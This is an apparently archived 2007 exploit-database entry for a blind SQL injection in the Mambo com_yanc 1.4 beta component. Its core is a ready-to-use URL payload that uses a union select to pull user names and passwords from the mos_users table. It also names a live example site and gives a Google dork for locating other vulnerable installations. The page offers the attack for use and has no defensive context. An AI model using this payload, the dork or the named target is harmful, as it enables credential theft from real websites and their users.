[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability
# Published : 2007-05-17
# Author : xoron
# Previous Title : MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability
# Next Title : GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability
------------------------------
-------------------------------
Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln
-------------------------------------------------------------
Bulan: Cyber-Security
-------------------------------------------------------------
Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Example:http://www.tnrb.net/
-------------------------------------------------------------
google dork: inurl:index.php?option=com_yanc
-------------------------------------------------------------
# www.Syue.com [2007-05-17]